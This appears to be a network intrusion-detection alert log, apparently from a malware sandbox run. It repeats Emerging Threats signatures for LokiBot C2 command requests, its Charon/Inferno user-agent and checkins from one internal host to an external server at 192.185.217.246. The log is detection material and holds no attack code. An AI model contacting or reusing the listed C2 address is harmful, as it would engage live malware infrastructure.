                                11/22/21-15:31:16.868716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.11.20192.185.217.246
                                11/22/21-15:31:17.660298TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.11.20192.185.217.246
                                11/22/21-15:31:17.660298TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.11.20192.185.217.246
                                11/22/21-15:31:17.660298TCP2025381ET TROJAN LokiBot Checkin4994080192.168.11.20192.185.217.246
                                11/22/21-15:31:17.660298TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.11.20192.185.217.246
                                11/22/21-15:31:18.452092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.11.20192.185.217.246
                                11/22/21-15:31:18.452092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.11.20192.185.217.246
                                11/22/21-15:31:18.452092TCP2025381ET TROJAN LokiBot Checkin4994180192.168.11.20192.185.217.246
                                11/22/21-15:31:18.452092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.11.20192.185.217.246
                                11/22/21-15:31:19.180508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.11.20192.185.217.246
                                11/22/21-15:31:19.180508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.11.20192.185.217.246
                                11/22/21-15:31:19.180508TCP2025381ET TROJAN LokiBot Checkin4994280192.168.11.20192.185.217.246
                                11/22/21-15:31:19.180508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.11.20192.185.217.246
                                11/22/21-15:31:20.004612TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.11.20192.185.217.246
                                11/22/21-15:31:20.004612TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.11.20192.185.217.246
                                11/22/21-15:31:20.004612TCP2025381ET TROJAN LokiBot Checkin4994380192.168.11.20192.185.217.246
                                11/22/21-15:31:20.004612TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.11.20192.185.217.246
                                11/22/21-15:31:20.820220TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.11.20192.185.217.246
                                11/22/21-15:31:20.820220TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.11.20192.185.217.246
                                11/22/21-15:31:20.820220TCP2025381ET TROJAN LokiBot Checkin4994480192.168.11.20192.185.217.246
                                11/22/21-15:31:20.820220TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.11.20192.185.217.246
                                11/22/21-15:31:21.626062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.11.20192.185.217.246
                                11/22/21-15:31:21.626062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.11.20192.185.217.246
                                11/22/21-15:31:21.626062TCP2025381ET TROJAN LokiBot Checkin4994580192.168.11.20192.185.217.246
                                11/22/21-15:31:21.626062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.11.20192.185.217.246
                                11/22/21-15:31:22.452424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.11.20192.185.217.246
                                11/22/21-15:31:22.452424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.11.20192.185.217.246
                                11/22/21-15:31:22.452424TCP2025381ET TROJAN LokiBot Checkin4994680192.168.11.20192.185.217.246
                                11/22/21-15:31:22.452424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.11.20192.185.217.246
                                11/22/21-15:31:23.293335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994780192.168.11.20192.185.217.246
                                11/22/21-15:31:23.293335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994780192.168.11.20192.185.217.246
                                11/22/21-15:31:23.293335TCP2025381ET TROJAN LokiBot Checkin4994780192.168.11.20192.185.217.246
                                11/22/21-15:31:23.293335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994780192.168.11.20192.185.217.246
                                11/22/21-15:31:24.087747TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.11.20192.185.217.246
                                11/22/21-15:31:24.087747TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.11.20192.185.217.246
                                11/22/21-15:31:24.087747TCP2025381ET TROJAN LokiBot Checkin4994880192.168.11.20192.185.217.246
                                11/22/21-15:31:24.087747TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.11.20192.185.217.246
                                11/22/21-15:31:24.870022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.11.20192.185.217.246
                                11/22/21-15:31:24.870022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.11.20192.185.217.246
                                11/22/21-15:31:24.870022TCP2025381ET TROJAN LokiBot Checkin4994980192.168.11.20192.185.217.246
                                11/22/21-15:31:24.870022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.11.20192.185.217.246
                                11/22/21-15:31:25.693862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.11.20192.185.217.246
                                11/22/21-15:31:25.693862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.11.20192.185.217.246
                                11/22/21-15:31:25.693862TCP2025381ET TROJAN LokiBot Checkin4995080192.168.11.20192.185.217.246
                                11/22/21-15:31:25.693862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.11.20192.185.217.246
                                11/22/21-15:31:26.511521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.11.20192.185.217.246
                                11/22/21-15:31:26.511521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.11.20192.185.217.246
                                11/22/21-15:31:26.511521TCP2025381ET TROJAN LokiBot Checkin4995180192.168.11.20192.185.217.246
                                11/22/21-15:31:26.511521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.11.20192.185.217.246
                                11/22/21-15:31:27.282411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.11.20192.185.217.246
                                11/22/21-15:31:27.282411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.11.20192.185.217.246
                                11/22/21-15:31:27.282411TCP2025381ET TROJAN LokiBot Checkin4995280192.168.11.20192.185.217.246
                                11/22/21-15:31:27.282411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.11.20192.185.217.246
                                11/22/21-15:31:28.111423TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.11.20192.185.217.246
                                11/22/21-15:31:28.111423TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.11.20192.185.217.246
                                11/22/21-15:31:28.111423TCP2025381ET TROJAN LokiBot Checkin4995380192.168.11.20192.185.217.246
                                11/22/21-15:31:28.111423TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.11.20192.185.217.246
                                11/22/21-15:31:29.007497TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.11.20192.185.217.246
                                11/22/21-15:31:29.007497TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.11.20192.185.217.246
                                11/22/21-15:31:29.007497TCP2025381ET TROJAN LokiBot Checkin4995480192.168.11.20192.185.217.246
                                11/22/21-15:31:29.007497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.11.20192.185.217.246
                                11/22/21-15:31:29.765252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.11.20192.185.217.246
                                11/22/21-15:31:29.765252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.11.20192.185.217.246
                                11/22/21-15:31:29.765252TCP2025381ET TROJAN LokiBot Checkin4995580192.168.11.20192.185.217.246
                                11/22/21-15:31:29.765252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.11.20192.185.217.246
                                11/22/21-15:31:30.555534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.11.20192.185.217.246
                                11/22/21-15:31:30.555534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.11.20192.185.217.246
                                11/22/21-15:31:30.555534TCP2025381ET TROJAN LokiBot Checkin4995680192.168.11.20192.185.217.246
                                11/22/21-15:31:30.555534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.11.20192.185.217.246
                                11/22/21-15:31:31.361750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.11.20192.185.217.246
                                11/22/21-15:31:31.361750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.11.20192.185.217.246
                                11/22/21-15:31:31.361750TCP2025381ET TROJAN LokiBot Checkin4995780192.168.11.20192.185.217.246
                                11/22/21-15:31:31.361750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.11.20192.185.217.246
                                11/22/21-15:31:32.179501TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.11.20192.185.217.246
                                11/22/21-15:31:32.179501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.11.20192.185.217.246
                                11/22/21-15:31:32.179501TCP2025381ET TROJAN LokiBot Checkin4995880192.168.11.20192.185.217.246
                                11/22/21-15:31:32.179501TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.11.20192.185.217.246
                                11/22/21-15:31:33.021231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.11.20192.185.217.246
                                11/22/21-15:31:33.021231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.11.20192.185.217.246
                                11/22/21-15:31:33.021231TCP2025381ET TROJAN LokiBot Checkin4995980192.168.11.20192.185.217.246
                                11/22/21-15:31:33.021231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.11.20192.185.217.246
                                11/22/21-15:31:33.873830TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.11.20192.185.217.246
                                11/22/21-15:31:33.873830TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.11.20192.185.217.246
                                11/22/21-15:31:33.873830TCP2025381ET TROJAN LokiBot Checkin4996080192.168.11.20192.185.217.246
                                11/22/21-15:31:33.873830TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.11.20192.185.217.246
                                11/22/21-15:31:34.697628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.11.20192.185.217.246
                                11/22/21-15:31:34.697628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.11.20192.185.217.246
                                11/22/21-15:31:34.697628TCP2025381ET TROJAN LokiBot Checkin4996180192.168.11.20192.185.217.246
                                11/22/21-15:31:34.697628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.11.20192.185.217.246
                                11/22/21-15:31:35.462082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.11.20192.185.217.246
                                11/22/21-15:31:35.462082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.11.20192.185.217.246
                                11/22/21-15:31:35.462082TCP2025381ET TROJAN LokiBot Checkin4996280192.168.11.20192.185.217.246
                                11/22/21-15:31:35.462082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.11.20192.185.217.246
                                11/22/21-15:31:36.343793TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.11.20192.185.217.246
                                11/22/21-15:31:36.343793TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.11.20192.185.217.246
                                11/22/21-15:31:36.343793TCP2025381ET TROJAN LokiBot Checkin4996380192.168.11.20192.185.217.246
                                11/22/21-15:31:36.343793TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.11.20192.185.217.246
                                11/22/21-15:31:37.159611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.11.20192.185.217.246
                                11/22/21-15:31:37.159611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.11.20192.185.217.246
                                11/22/21-15:31:37.159611TCP2025381ET TROJAN LokiBot Checkin4996480192.168.11.20192.185.217.246
                                11/22/21-15:31:37.159611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.11.20192.185.217.246
                                11/22/21-15:31:37.883072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.11.20192.185.217.246
                                11/22/21-15:31:37.883072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.11.20192.185.217.246
                                11/22/21-15:31:37.883072TCP2025381ET TROJAN LokiBot Checkin4996580192.168.11.20192.185.217.246
                                11/22/21-15:31:37.883072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.11.20192.185.217.246
                                11/22/21-15:31:38.665075TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.11.20192.185.217.246
                                11/22/21-15:31:38.665075TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.11.20192.185.217.246
                                11/22/21-15:31:38.665075TCP2025381ET TROJAN LokiBot Checkin4996680192.168.11.20192.185.217.246
                                11/22/21-15:31:38.665075TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.11.20192.185.217.246
                                11/22/21-15:31:39.508989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.11.20192.185.217.246
                                11/22/21-15:31:39.508989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.11.20192.185.217.246
                                11/22/21-15:31:39.508989TCP2025381ET TROJAN LokiBot Checkin4996780192.168.11.20192.185.217.246
                                11/22/21-15:31:39.508989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.11.20192.185.217.246
                                11/22/21-15:31:40.342505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.11.20192.185.217.246
                                11/22/21-15:31:40.342505TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.11.20192.185.217.246
                                11/22/21-15:31:40.342505TCP2025381ET TROJAN LokiBot Checkin4996880192.168.11.20192.185.217.246
                                11/22/21-15:31:40.342505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.11.20192.185.217.246
                                11/22/21-15:31:41.065079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.11.20192.185.217.246
                                11/22/21-15:31:41.065079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.11.20192.185.217.246
                                11/22/21-15:31:41.065079TCP2025381ET TROJAN LokiBot Checkin4996980192.168.11.20192.185.217.246
                                11/22/21-15:31:41.065079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.11.20192.185.217.246
                                11/22/21-15:31:41.913465TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.11.20192.185.217.246
                                11/22/21-15:31:41.913465TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.11.20192.185.217.246
                                11/22/21-15:31:41.913465TCP2025381ET TROJAN LokiBot Checkin4997080192.168.11.20192.185.217.246
                                11/22/21-15:31:41.913465TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.11.20192.185.217.246
                                11/22/21-15:31:42.724709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.11.20192.185.217.246
                                11/22/21-15:31:42.724709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.11.20192.185.217.246
                                11/22/21-15:31:42.724709TCP2025381ET TROJAN LokiBot Checkin4997180192.168.11.20192.185.217.246
                                11/22/21-15:31:42.724709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.11.20192.185.217.246
                                11/22/21-15:31:43.504881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.11.20192.185.217.246
                                11/22/21-15:31:43.504881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.11.20192.185.217.246
                                11/22/21-15:31:43.504881TCP2025381ET TROJAN LokiBot Checkin4997280192.168.11.20192.185.217.246
                                11/22/21-15:31:43.504881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.11.20192.185.217.246
                                11/22/21-15:31:44.253706TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.11.20192.185.217.246
                                11/22/21-15:31:44.253706TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.11.20192.185.217.246
                                11/22/21-15:31:44.253706TCP2025381ET TROJAN LokiBot Checkin4997380192.168.11.20192.185.217.246
                                11/22/21-15:31:44.253706TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.11.20192.185.217.246
                                11/22/21-15:31:45.037582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.11.20192.185.217.246
                                11/22/21-15:31:45.037582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.11.20192.185.217.246
                                11/22/21-15:31:45.037582TCP2025381ET TROJAN LokiBot Checkin4997480192.168.11.20192.185.217.246
                                11/22/21-15:31:45.037582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.11.20192.185.217.246
                                11/22/21-15:31:45.866162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.11.20192.185.217.246
                                11/22/21-15:31:45.866162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.11.20192.185.217.246
                                11/22/21-15:31:45.866162TCP2025381ET TROJAN LokiBot Checkin4997580192.168.11.20192.185.217.246
                                11/22/21-15:31:45.866162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.11.20192.185.217.246
                                11/22/21-15:31:46.675288TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.11.20192.185.217.246
                                11/22/21-15:31:46.675288TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.11.20192.185.217.246
                                11/22/21-15:31:46.675288TCP2025381ET TROJAN LokiBot Checkin4997680192.168.11.20192.185.217.246
                                11/22/21-15:31:46.675288TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.11.20192.185.217.246
                                11/22/21-15:31:47.497140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.11.20192.185.217.246
                                11/22/21-15:31:47.497140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.11.20192.185.217.246
                                11/22/21-15:31:47.497140TCP2025381ET TROJAN LokiBot Checkin4997780192.168.11.20192.185.217.246
                                11/22/21-15:31:47.497140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.11.20192.185.217.246
                                11/22/21-15:31:48.260603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.11.20192.185.217.246
                                11/22/21-15:31:48.260603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.11.20192.185.217.246
                                11/22/21-15:31:48.260603TCP2025381ET TROJAN LokiBot Checkin4997880192.168.11.20192.185.217.246
                                11/22/21-15:31:48.260603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.11.20192.185.217.246
                                11/22/21-15:31:49.070746TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.11.20192.185.217.246
                                11/22/21-15:31:49.070746TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.11.20192.185.217.246
                                11/22/21-15:31:49.070746TCP2025381ET TROJAN LokiBot Checkin4997980192.168.11.20192.185.217.246
                                11/22/21-15:31:49.070746TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.11.20192.185.217.246
                                11/22/21-15:31:49.908600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.11.20192.185.217.246
                                11/22/21-15:31:49.908600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.11.20192.185.217.246
                                11/22/21-15:31:49.908600TCP2025381ET TROJAN LokiBot Checkin4998080192.168.11.20192.185.217.246
                                11/22/21-15:31:49.908600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.11.20192.185.217.246
                                11/22/21-15:31:50.711122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.11.20192.185.217.246
                                11/22/21-15:31:50.711122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.11.20192.185.217.246
                                11/22/21-15:31:50.711122TCP2025381ET TROJAN LokiBot Checkin4998180192.168.11.20192.185.217.246
                                11/22/21-15:31:50.711122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.11.20192.185.217.246
                                11/22/21-15:31:51.552987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.11.20192.185.217.246
                                11/22/21-15:31:51.552987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.11.20192.185.217.246
                                11/22/21-15:31:51.552987TCP2025381ET TROJAN LokiBot Checkin4998280192.168.11.20192.185.217.246
                                11/22/21-15:31:51.552987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.11.20192.185.217.246
                                11/22/21-15:31:52.315529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.11.20192.185.217.246
                                11/22/21-15:31:52.315529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.11.20192.185.217.246
                                11/22/21-15:31:52.315529TCP2025381ET TROJAN LokiBot Checkin4998380192.168.11.20192.185.217.246
                                11/22/21-15:31:52.315529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.11.20192.185.217.246
                                11/22/21-15:31:53.132625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.11.20192.185.217.246
                                11/22/21-15:31:53.132625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.11.20192.185.217.246
                                11/22/21-15:31:53.132625TCP2025381ET TROJAN LokiBot Checkin4998480192.168.11.20192.185.217.246
                                11/22/21-15:31:53.132625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.11.20192.185.217.246
                                11/22/21-15:31:53.962396TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.11.20192.185.217.246
                                11/22/21-15:31:53.962396TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.11.20192.185.217.246
                                11/22/21-15:31:53.962396TCP2025381ET TROJAN LokiBot Checkin4998580192.168.11.20192.185.217.246
                                11/22/21-15:31:53.962396TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.11.20192.185.217.246
                                11/22/21-15:31:54.786218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.11.20192.185.217.246
                                11/22/21-15:31:54.786218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.11.20192.185.217.246
                                11/22/21-15:31:54.786218TCP2025381ET TROJAN LokiBot Checkin4998680192.168.11.20192.185.217.246
                                11/22/21-15:31:54.786218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.11.20192.185.217.246
                                11/22/21-15:31:55.555199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.11.20192.185.217.246
                                11/22/21-15:31:55.555199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.11.20192.185.217.246
                                11/22/21-15:31:55.555199TCP2025381ET TROJAN LokiBot Checkin4998780192.168.11.20192.185.217.246
                                11/22/21-15:31:55.555199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.11.20192.185.217.246
                                11/22/21-15:31:56.392907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.11.20192.185.217.246
                                11/22/21-15:31:56.392907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.11.20192.185.217.246
                                11/22/21-15:31:56.392907TCP2025381ET TROJAN LokiBot Checkin4998880192.168.11.20192.185.217.246
                                11/22/21-15:31:56.392907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.11.20192.185.217.246
                                11/22/21-15:31:57.335410TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.11.20192.185.217.246
                                11/22/21-15:31:57.335410TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.11.20192.185.217.246
                                11/22/21-15:31:57.335410TCP2025381ET TROJAN LokiBot Checkin4998980192.168.11.20192.185.217.246
                                11/22/21-15:31:57.335410TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.11.20192.185.217.246
                                11/22/21-15:31:58.149193TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.11.20192.185.217.246
                                11/22/21-15:31:58.149193TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.11.20192.185.217.246
                                11/22/21-15:31:58.149193TCP2025381ET TROJAN LokiBot Checkin4999080192.168.11.20192.185.217.246
                                11/22/21-15:31:58.149193TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2025381ET TROJAN LokiBot Checkin4999180192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2025381ET TROJAN LokiBot Checkin4999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2025381ET TROJAN LokiBot Checkin4999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2025381ET TROJAN LokiBot Checkin4999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2025381ET TROJAN LokiBot Checkin4999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2025381ET TROJAN LokiBot Checkin4999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2025381ET TROJAN LokiBot Checkin4999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2025381ET TROJAN LokiBot Checkin4999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.11.20192.185.217.246
